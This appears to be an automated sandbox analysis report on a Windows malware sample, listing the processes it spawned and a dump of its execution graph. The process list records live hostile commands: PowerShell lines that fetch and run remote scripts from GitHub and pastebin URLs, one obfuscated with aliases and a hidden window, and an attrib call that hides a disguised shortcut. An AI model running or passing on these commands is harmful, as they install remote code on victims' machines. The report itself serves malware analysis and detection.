                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt -usebasicparsing)
                                                                                                Imagebase:0x8b0000
                                                                                                File size:457'216 bytes
                                                                                                MD5 hash:3F92A35BA26FF7A11A49E15EFE18F0C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:5
                                                                                                Start time:09:54:08
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff720030000
                                                                                                File size:873'472 bytes
                                                                                                MD5 hash:7366FBEFE66BA0F1F5304F7D6FEF09FE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:7
                                                                                                Start time:09:54:11
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.cmdline"
                                                                                                Imagebase:0x890000
                                                                                                File size:2'141'552 bytes
                                                                                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:8
                                                                                                Start time:09:54:11
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF7B.tmp" "c:\Users\user\AppData\Local\Temp\ztufso2n\CSC92EFC5D82192472686D16339634A9CDA.TMP"
                                                                                                Imagebase:0x180000
                                                                                                File size:46'832 bytes
                                                                                                MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:11
                                                                                                Start time:09:54:12
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7676 -s 1932
                                                                                                Imagebase:0xac0000
                                                                                                File size:489'328 bytes
                                                                                                MD5 hash:F5210A4A7E411A1BAD3844586A74B574
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:14
                                                                                                Start time:09:54:47
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                                                Imagebase:0x810000
                                                                                                File size:19'456 bytes
                                                                                                MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:15
                                                                                                Start time:09:54:47
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\forfiles.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                                Imagebase:0x7ff6ce8d0000
                                                                                                File size:52'224 bytes
                                                                                                MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:16
                                                                                                Start time:09:54:47
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff720030000
                                                                                                File size:873'472 bytes
                                                                                                MD5 hash:7366FBEFE66BA0F1F5304F7D6FEF09FE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:17
                                                                                                Start time:09:54:47
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                                Imagebase:0x7ff6f70b0000
                                                                                                File size:486'400 bytes
                                                                                                MD5 hash:DFD66604CA0898E8E26DF7B1635B6326
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:18
                                                                                                Start time:09:54:50
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                                Imagebase:0x7ff6f70b0000
                                                                                                File size:486'400 bytes
                                                                                                MD5 hash:DFD66604CA0898E8E26DF7B1635B6326
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:19
                                                                                                Start time:09:54:55
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\forfiles.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                                Imagebase:0x7ff6ce8d0000
                                                                                                File size:52'224 bytes
                                                                                                MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:20
                                                                                                Start time:09:54:55
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff720030000
                                                                                                File size:873'472 bytes
                                                                                                MD5 hash:7366FBEFE66BA0F1F5304F7D6FEF09FE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:21
                                                                                                Start time:09:54:55
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                                Imagebase:0x7ff6f70b0000
                                                                                                File size:486'400 bytes
                                                                                                MD5 hash:DFD66604CA0898E8E26DF7B1635B6326
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:24
                                                                                                Start time:09:54:57
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                                Imagebase:0x7ff6f70b0000
                                                                                                File size:486'400 bytes
                                                                                                MD5 hash:DFD66604CA0898E8E26DF7B1635B6326
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true


                                                                                                  Execution Graph

                                                                                                  Execution Coverage:2%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:11.6%
                                                                                                  Total number of Nodes:1314
                                                                                                  Total number of Limit Nodes:5
                                                                                                  execution_graph: node and edge listing of the interactive execution graph (numbered nodes, code addresses, edges, and resolved API names such as IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetModuleHandleW, GetStartupInfoW, Sleep, VirtualAlloc, VirtualFree, LoadLibraryExW, FreeLibrary, GetProcAddress, GetLastError, SetLastError, TlsAlloc, TlsSetValue, TlsGetValue, TlsFree, HeapAlloc, HeapFree, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection); the raw graph data is not reproduced here.
___free_lconv_mon 12 API calls 16793->16798 16795 685db8 16794->16795 16796 685da1 16794->16796 16799 685a08 __dosmaperr 12 API calls 16795->16799 16797 686f3e __dosmaperr 6 API calls 16796->16797 16797->16793 16798->16800 16801 685dc3 16799->16801 16800->16768 16802 6847ff ___free_lconv_mon 12 API calls 16801->16802 16802->16800 16804 6858a8 ___scrt_is_nonwritable_in_current_image 16803->16804 16817 67ec95 EnterCriticalSection 16804->16817 16806 6858b2 16818 6858e2 16806->16818 16809 6859ae 16810 6859ba ___scrt_is_nonwritable_in_current_image 16809->16810 16822 67ec95 EnterCriticalSection 16810->16822 16812 6859c4 16823 685b8f 16812->16823 16814 6859dc 16827 6859fc 16814->16827 16817->16806 16821 67ecdd LeaveCriticalSection 16818->16821 16820 6858d0 16820->16809 16821->16820 16822->16812 16824 685b9e __Getctype 16823->16824 16826 685bc5 __Getctype 16823->16826 16824->16826 16830 68ce4e 16824->16830 16826->16814 16944 67ecdd LeaveCriticalSection 16827->16944 16829 6859ea 16829->16685 16831 68ce64 16830->16831 16833 68cece 16830->16833 16831->16833 16835 68ce97 16831->16835 16841 6847ff ___free_lconv_mon 14 API calls 16831->16841 16834 6847ff ___free_lconv_mon 14 API calls 16833->16834 16857 68cf1c 16833->16857 16836 68cef0 16834->16836 16837 68ceb9 16835->16837 16842 6847ff ___free_lconv_mon 14 API calls 16835->16842 16838 6847ff ___free_lconv_mon 14 API calls 16836->16838 16840 6847ff ___free_lconv_mon 14 API calls 16837->16840 16839 68cf03 16838->16839 16843 6847ff ___free_lconv_mon 14 API calls 16839->16843 16844 68cec3 16840->16844 16846 68ce8c 16841->16846 16847 68ceae 16842->16847 16848 68cf11 16843->16848 16849 6847ff ___free_lconv_mon 14 API calls 16844->16849 16845 68cf8a 16850 6847ff ___free_lconv_mon 14 API calls 16845->16850 16858 68c152 16846->16858 16886 68c5b1 16847->16886 16854 6847ff ___free_lconv_mon 14 API calls 16848->16854 16849->16833 16855 68cf90 16850->16855 16852 6847ff 14 API calls ___free_lconv_mon 16856 68cf2a 16852->16856 16854->16857 
16855->16826 16856->16845 16856->16852 16898 68cfbf 16857->16898 16859 68c24c 16858->16859 16860 68c163 16858->16860 16859->16835 16861 68c174 16860->16861 16862 6847ff ___free_lconv_mon 14 API calls 16860->16862 16863 68c186 16861->16863 16864 6847ff ___free_lconv_mon 14 API calls 16861->16864 16862->16861 16865 68c198 16863->16865 16867 6847ff ___free_lconv_mon 14 API calls 16863->16867 16864->16863 16866 68c1aa 16865->16866 16868 6847ff ___free_lconv_mon 14 API calls 16865->16868 16869 68c1bc 16866->16869 16870 6847ff ___free_lconv_mon 14 API calls 16866->16870 16867->16865 16868->16866 16871 68c1ce 16869->16871 16872 6847ff ___free_lconv_mon 14 API calls 16869->16872 16870->16869 16873 68c1e0 16871->16873 16875 6847ff ___free_lconv_mon 14 API calls 16871->16875 16872->16871 16874 68c1f2 16873->16874 16876 6847ff ___free_lconv_mon 14 API calls 16873->16876 16877 68c204 16874->16877 16878 6847ff ___free_lconv_mon 14 API calls 16874->16878 16875->16873 16876->16874 16879 68c216 16877->16879 16880 6847ff ___free_lconv_mon 14 API calls 16877->16880 16878->16877 16881 68c228 16879->16881 16883 6847ff ___free_lconv_mon 14 API calls 16879->16883 16880->16879 16882 68c23a 16881->16882 16884 6847ff ___free_lconv_mon 14 API calls 16881->16884 16882->16859 16885 6847ff ___free_lconv_mon 14 API calls 16882->16885 16883->16881 16884->16882 16885->16859 16887 68c5be 16886->16887 16897 68c616 16886->16897 16888 68c5ce 16887->16888 16889 6847ff ___free_lconv_mon 14 API calls 16887->16889 16890 68c5e0 16888->16890 16891 6847ff ___free_lconv_mon 14 API calls 16888->16891 16889->16888 16892 6847ff ___free_lconv_mon 14 API calls 16890->16892 16894 68c5f2 16890->16894 16891->16890 16892->16894 16893 68c604 16896 6847ff ___free_lconv_mon 14 API calls 16893->16896 16893->16897 16894->16893 16895 6847ff ___free_lconv_mon 14 API calls 16894->16895 16895->16893 16896->16897 16897->16837 16899 68cfeb 16898->16899 16900 68cfcc 16898->16900 16899->16856 16900->16899 16904 68cad8 
16900->16904 16903 6847ff ___free_lconv_mon 14 API calls 16903->16899 16905 68cbb6 16904->16905 16906 68cae9 16904->16906 16905->16903 16940 68c837 16906->16940 16909 68c837 __Getctype 14 API calls 16910 68cafc 16909->16910 16911 68c837 __Getctype 14 API calls 16910->16911 16912 68cb07 16911->16912 16913 68c837 __Getctype 14 API calls 16912->16913 16914 68cb12 16913->16914 16915 68c837 __Getctype 14 API calls 16914->16915 16916 68cb20 16915->16916 16917 6847ff ___free_lconv_mon 14 API calls 16916->16917 16918 68cb2b 16917->16918 16919 6847ff ___free_lconv_mon 14 API calls 16918->16919 16920 68cb36 16919->16920 16921 6847ff ___free_lconv_mon 14 API calls 16920->16921 16922 68cb41 16921->16922 16923 68c837 __Getctype 14 API calls 16922->16923 16924 68cb4f 16923->16924 16925 68c837 __Getctype 14 API calls 16924->16925 16926 68cb5d 16925->16926 16927 68c837 __Getctype 14 API calls 16926->16927 16928 68cb6e 16927->16928 16929 68c837 __Getctype 14 API calls 16928->16929 16930 68cb7c 16929->16930 16931 68c837 __Getctype 14 API calls 16930->16931 16932 68cb8a 16931->16932 16933 6847ff ___free_lconv_mon 14 API calls 16932->16933 16934 68cb95 16933->16934 16935 6847ff ___free_lconv_mon 14 API calls 16934->16935 16936 68cba0 16935->16936 16937 6847ff ___free_lconv_mon 14 API calls 16936->16937 16938 68cbab 16937->16938 16939 6847ff ___free_lconv_mon 14 API calls 16938->16939 16939->16905 16941 68c849 16940->16941 16942 68c858 16941->16942 16943 6847ff ___free_lconv_mon 14 API calls 16941->16943 16942->16909 16943->16941 16944->16829 16981 68a608 16945->16981 16948 68a71f 16952 68a72b ___scrt_is_nonwritable_in_current_image 16948->16952 16949 68a78d CallUnexpected 16958 68a7c3 CallUnexpected 16949->16958 16994 67ec95 EnterCriticalSection 16949->16994 16950 685d2b __dosmaperr 14 API calls 16957 68a75c CallUnexpected 16950->16957 16951 68a77b 16953 680d0e __dosmaperr 14 API calls 16951->16953 16952->16949 16952->16950 16952->16951 16952->16957 16954 68a780 16953->16954 16992 
67ebf3 16954->16992 16957->16949 16957->16951 16964 68a765 16957->16964 16960 68a8fd 16958->16960 16961 68a800 16958->16961 16972 68a82e 16958->16972 16963 68a908 16960->16963 17026 67ecdd LeaveCriticalSection 16960->17026 16961->16972 16995 685bda GetLastError 16961->16995 16966 682338 CallUnexpected 21 API calls 16963->16966 16964->16745 16967 68a910 16966->16967 16969 685bda __Getctype 41 API calls 16973 68a883 16969->16973 16971 685bda __Getctype 41 API calls 16971->16972 17022 68a8a9 16972->17022 16973->16964 16974 685bda __Getctype 41 API calls 16973->16974 16974->16964 16976 67ea13 __fread_nolock CallUnexpected 16975->16976 16977 67ea3f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16976->16977 16978 67eb10 CallUnexpected 16977->16978 17091 678287 16978->17091 16980 67eb2e 16980->16742 16982 68a614 ___scrt_is_nonwritable_in_current_image 16981->16982 16987 67ec95 EnterCriticalSection 16982->16987 16984 68a622 16988 68a664 16984->16988 16987->16984 16991 67ecdd LeaveCriticalSection 16988->16991 16990 681292 16990->16745 16990->16948 16991->16990 17027 67eb3f 16992->17027 16994->16958 16996 685bf6 16995->16996 16997 685bf0 16995->16997 16999 686f3e __dosmaperr 6 API calls 16996->16999 17001 685bfa SetLastError 16996->17001 16998 686eff __dosmaperr 6 API calls 16997->16998 16998->16996 17000 685c12 16999->17000 17000->17001 17003 6847a2 __dosmaperr 14 API calls 17000->17003 17005 685c8a 17001->17005 17006 685c8f 17001->17006 17004 685c27 17003->17004 17008 685c2f 17004->17008 17009 685c40 17004->17009 17005->16971 17007 68128d CallUnexpected 39 API calls 17006->17007 17011 685c94 17007->17011 17012 686f3e __dosmaperr 6 API calls 17008->17012 17010 686f3e __dosmaperr 6 API calls 17009->17010 17013 685c4c 17010->17013 17019 685c3d 17012->17019 17014 685c50 17013->17014 17015 685c67 17013->17015 17016 686f3e __dosmaperr 6 API calls 17014->17016 17018 685a08 __dosmaperr 14 API calls 17015->17018 17016->17019 17017 6847ff ___free_lconv_mon 
14 API calls 17017->17001 17020 685c72 17018->17020 17019->17017 17021 6847ff ___free_lconv_mon 14 API calls 17020->17021 17021->17001 17023 68a875 17022->17023 17024 68a8ad 17022->17024 17023->16964 17023->16969 17023->16973 17090 67ecdd LeaveCriticalSection 17024->17090 17026->16963 17028 67eb51 _Fputc 17027->17028 17033 67eb76 17028->17033 17034 67eb86 17033->17034 17035 67eb8d 17033->17035 17048 67da00 GetLastError 17034->17048 17039 67eb69 17035->17039 17052 67e9ce 17035->17052 17038 67ebc2 17038->17039 17055 67ec20 IsProcessorFeaturePresent 17038->17055 17042 67d880 17039->17042 17041 67ebf2 17043 67d88c 17042->17043 17044 67d8a3 17043->17044 17081 67da50 17043->17081 17046 67d8b6 17044->17046 17047 67da50 _Fputc 41 API calls 17044->17047 17047->17046 17049 67da19 17048->17049 17059 685ddc 17049->17059 17053 67e9f2 17052->17053 17054 67e9d9 GetLastError SetLastError 17052->17054 17053->17038 17054->17038 17056 67ec2c 17055->17056 17057 67e9f7 CallUnexpected 8 API calls 17056->17057 17058 67ec41 GetCurrentProcess TerminateProcess 17057->17058 17058->17041 17060 685def 17059->17060 17061 685df5 17059->17061 17063 686eff __dosmaperr 6 API calls 17060->17063 17062 686f3e __dosmaperr 6 API calls 17061->17062 17066 67da35 SetLastError 17061->17066 17064 685e0f 17062->17064 17063->17061 17065 6847a2 __dosmaperr 14 API calls 17064->17065 17064->17066 17067 685e1f 17065->17067 17066->17035 17068 685e3c 17067->17068 17069 685e27 17067->17069 17071 686f3e __dosmaperr 6 API calls 17068->17071 17070 686f3e __dosmaperr 6 API calls 17069->17070 17072 685e33 17070->17072 17073 685e48 17071->17073 17078 6847ff ___free_lconv_mon 14 API calls 17072->17078 17074 685e5b 17073->17074 17075 685e4c 17073->17075 17077 685a08 __dosmaperr 14 API calls 17074->17077 17076 686f3e __dosmaperr 6 API calls 17075->17076 17076->17072 17079 685e66 17077->17079 17078->17066 17080 6847ff ___free_lconv_mon 14 API calls 17079->17080 17080->17066 17082 67da9f 17081->17082 17083 67da5e GetLastError 
17081->17083 17082->17044 17084 67da6d 17083->17084 17085 685ddc _Fputc 14 API calls 17084->17085 17086 67da8a SetLastError 17085->17086 17086->17082 17087 67daa6 17086->17087 17088 68128d CallUnexpected 39 API calls 17087->17088 17089 67daab 17088->17089 17090->17023 17092 678290 IsProcessorFeaturePresent 17091->17092 17093 67828f 17091->17093 17095 678b45 17092->17095 17093->16980 17098 678b08 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17095->17098 17097 678c28 17097->16980 17098->17097 17100 68ba15 ___scrt_is_nonwritable_in_current_image 17099->17100 17107 68ba2f 17100->17107 17141 67ec95 EnterCriticalSection 17100->17141 17102 68ba3f 17108 6847ff ___free_lconv_mon 14 API calls 17102->17108 17109 68ba6b 17102->17109 17103 68b8de 17110 68b63b 17103->17110 17104 68128d CallUnexpected 41 API calls 17106 68baa8 17104->17106 17107->17103 17107->17104 17108->17109 17142 68ba88 17109->17142 17146 680d21 17110->17146 17113 68b65c GetOEMCP 17116 68b685 17113->17116 17114 68b66e 17115 68b673 GetACP 17114->17115 17114->17116 17115->17116 17116->16692 17117 684839 17116->17117 17118 684877 17117->17118 17122 684847 __dosmaperr 17117->17122 17120 680d0e __dosmaperr 14 API calls 17118->17120 17119 684862 HeapAlloc 17121 684875 17119->17121 17119->17122 17120->17121 17121->16695 17121->16696 17122->17118 17122->17119 17123 681851 std::_Facet_Register 2 API calls 17122->17123 17123->17122 17125 68b63b 43 API calls 17124->17125 17126 68bb24 17125->17126 17128 68bb61 IsValidCodePage 17126->17128 17132 68bb7c __fread_nolock 17126->17132 17127 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17129 68b94b 17127->17129 17130 68bb73 17128->17130 17128->17132 17129->16700 17129->16701 17131 68bb9c GetCPInfo 17130->17131 17130->17132 17131->17132 17132->17127 17134 68b539 ___scrt_is_nonwritable_in_current_image 17133->17134 17189 67ec95 EnterCriticalSection 17134->17189 17136 68b543 17190 68b57a 17136->17190 
17141->17102 17145 67ecdd LeaveCriticalSection 17142->17145 17144 68ba8f 17144->17107 17145->17144 17147 680d3f 17146->17147 17148 680d38 17146->17148 17147->17148 17149 685bda __Getctype 41 API calls 17147->17149 17148->17113 17148->17114 17150 680d60 17149->17150 17154 684887 17150->17154 17155 68489a 17154->17155 17156 680d76 17154->17156 17155->17156 17162 68d09c 17155->17162 17158 6848e5 17156->17158 17159 6848f8 17158->17159 17160 68490d 17158->17160 17159->17160 17184 68baf1 17159->17184 17160->17148 17163 68d0a8 ___scrt_is_nonwritable_in_current_image 17162->17163 17164 685bda __Getctype 41 API calls 17163->17164 17165 68d0b1 17164->17165 17172 68d0f7 17165->17172 17175 67ec95 EnterCriticalSection 17165->17175 17167 68d0cf 17176 68d11d 17167->17176 17172->17156 17173 68128d CallUnexpected 41 API calls 17174 68d11c 17173->17174 17175->17167 17177 68d12b __Getctype 17176->17177 17179 68d0e0 17176->17179 17178 68ce4e __Getctype 14 API calls 17177->17178 17177->17179 17178->17179 17180 68d0fc 17179->17180 17183 67ecdd LeaveCriticalSection 17180->17183 17182 68d0f3 17182->17172 17182->17173 17183->17182 17185 685bda __Getctype 41 API calls 17184->17185 17186 68baf6 17185->17186 17187 68ba09 std::_Locinfo::_Locinfo_ctor 41 API calls 17186->17187 17188 68bb01 17187->17188 17188->17160 17189->17136 17200 67fbc5 17190->17200 17192 68b59c 17193 67fbc5 __fread_nolock 41 API calls 17192->17193 17194 68b5bb 17193->17194 17195 68b550 17194->17195 17196 6847ff ___free_lconv_mon 14 API calls 17194->17196 17197 68b56e 17195->17197 17196->17195 17214 67ecdd LeaveCriticalSection 17197->17214 17199 68b55c 17199->16705 17201 67fbd6 17200->17201 17209 67fbd2 _Yarn 17200->17209 17202 67fbdd 17201->17202 17205 67fbf0 __fread_nolock 17201->17205 17203 680d0e __dosmaperr 14 API calls 17202->17203 17204 67fbe2 17203->17204 17206 67ebf3 ___std_exception_copy 41 API calls 17204->17206 17207 67fc27 17205->17207 17208 67fc1e 17205->17208 17205->17209 17206->17209 17207->17209 17212 
680d0e __dosmaperr 14 API calls 17207->17212 17210 680d0e __dosmaperr 14 API calls 17208->17210 17209->17192 17211 67fc23 17210->17211 17213 67ebf3 ___std_exception_copy 41 API calls 17211->17213 17212->17211 17213->17209 17214->17199 17216 680d21 std::_Locinfo::_Locinfo_ctor 41 API calls 17215->17216 17217 68bd1c 17216->17217 17217->16496 17219 674ff1 17218->17219 17220 674f40 17218->17220 17222 6712e0 std::ios_base::_Init 42 API calls 17219->17222 17221 674f4c _Yarn 17220->17221 17223 674f74 17220->17223 17226 674faf 17220->17226 17227 674fb8 17220->17227 17221->16499 17224 674ff6 17222->17224 17228 67829a std::_Facet_Register 42 API calls 17223->17228 17225 671240 Concurrency::cancel_current_task 42 API calls 17224->17225 17229 674f87 17225->17229 17226->17223 17226->17224 17231 67829a std::_Facet_Register 42 API calls 17227->17231 17233 674f90 _Yarn 17227->17233 17228->17229 17230 67ec03 std::ios_base::_Init 41 API calls 17229->17230 17229->17233 17232 675000 17230->17232 17231->17233 17233->16499 17235 6720ff ___scrt_uninitialize_crt 17234->17235 17236 672139 MultiByteToWideChar 17235->17236 17432 674dc0 17236->17432 17238 67217b MultiByteToWideChar InternetOpenW 17240 67226d InternetOpenUrlW 17238->17240 17241 6721d9 GetLastError 17238->17241 17242 67229e InternetCloseHandle 17240->17242 17243 6722aa InternetReadFile 17240->17243 17448 674820 17241->17448 17250 6721f6 17242->17250 17245 672349 InternetCloseHandle InternetCloseHandle 17243->17245 17246 6722f9 17243->17246 17249 672243 messages 17245->17249 17245->17250 17246->17245 17252 67230a 17246->17252 17253 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17249->17253 17250->17249 17256 6723b7 17250->17256 17252->17246 17474 675f30 17252->17474 17257 672266 17253->17257 17259 67ec03 std::ios_base::_Init 41 API calls 17256->17259 17257->16545 17258 67231e InternetReadFile 17258->17245 17258->17252 17260 6723bc CreateProcessW 17259->17260 17262 672576 MessageBoxW 17260->17262 
17263 672559 WaitForSingleObject CloseHandle CloseHandle 17260->17263 17264 67258a 17262->17264 17263->17264 17265 6725b6 messages 17264->17265 17267 6725db 17264->17267 17266 678287 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 17265->17266 17268 6725cd 17266->17268 17269 67ec03 std::ios_base::_Init 41 API calls 17267->17269 17268->16545 17270 6725e0 17269->17270 17271 674f20 std::ios_base::_Init 42 API calls 17270->17271 17272 672640 17271->17272 17273 674f20 std::ios_base::_Init 42 API calls 17272->17273 17274 672674 17273->17274 17275 674f20 std::ios_base::_Init 42 API calls 17274->17275 17276 6726a8 17275->17276 17277 674f20 std::ios_base::_Init 42 API calls 17276->17277 17278 6726dc 17277->17278 17279 674f20 std::ios_base::_Init 42 API calls 17278->17279 17280 672710 17279->17280 17281 672ddb 17280->17281 17284 67272d 17280->17284 17282 672de0 17281->17282 17283 6712e0 std::ios_base::_Init 42 API calls 17281->17283 17286 671240 Concurrency::cancel_current_task 42 API calls 17282->17286 17283->17282 17285 67279f 17284->17285 17287 6727e7 17284->17287 17288 6727f4 17284->17288 17294 6727b2 _Yarn 17284->17294 17291 67829a std::_Facet_Register 42 API calls 17285->17291 17289 672de5 17286->17289 17287->17282 17287->17285 17293 67829a std::_Facet_Register 42 API calls 17288->17293 17288->17294 17290 67ec03 std::ios_base::_Init 41 API calls 17289->17290 17292 672dea 17290->17292 17291->17294 17295 67ec03 std::ios_base::_Init 41 API calls 17292->17295 17293->17294 17294->17289 17297 675590 std::ios_base::_Init 42 API calls 17294->17297 17298 672882 _Yarn 17294->17298 17296 672def 17295->17296 17299 67ec03 std::ios_base::_Init 41 API calls 17296->17299 17297->17298 17300 675590 std::ios_base::_Init 42 API calls 17298->17300 17301 67292a _Yarn 17298->17301 17303 672df4 17299->17303 17300->17301 17302 675590 std::ios_base::_Init 42 API calls 17301->17302 17306 6729d2 _Yarn messages 17301->17306 17302->17306 17305 674460 42 API calls 17303->17305 
